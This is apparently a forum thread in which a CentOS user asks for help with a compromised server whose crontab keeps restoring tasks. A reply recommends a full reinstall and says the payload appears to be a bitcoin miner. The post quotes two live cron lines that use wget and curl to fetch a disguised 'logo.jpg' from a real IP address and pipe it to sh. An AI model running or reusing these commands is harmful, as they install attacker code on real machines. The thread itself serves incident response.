CentOS

problems with crontab tasks.

good day.

I have problems with a centos server that cron tasks are restored and creates the following tasks.
* / 26 * * * * wget -O--q http://5.188.87.12/langs/logo.jpg|sh
* / 25 * * * * curl http://5.188.87.12/langs/logo.jpg|sh
I request your support, since I have not managed to disinfect the server.

If that is root's crontab then you need to backup your data, reinstall the system and then restore (carefully inspecting the restored data for any signs of compromise). You cannot recover from a root compromise safely. You can never be 100% sure that you have found all backdoors into the server.

The code there appears to be a bitcoin miner.

You should also attempt to locate how they got into your server in the first place. Make sure that your replacement install is fully up to date before you put it online.

For the record, I've also sent a note about this to the abuse email addresses of the two affected ISPs so that they would shut down those servers.

thank you very much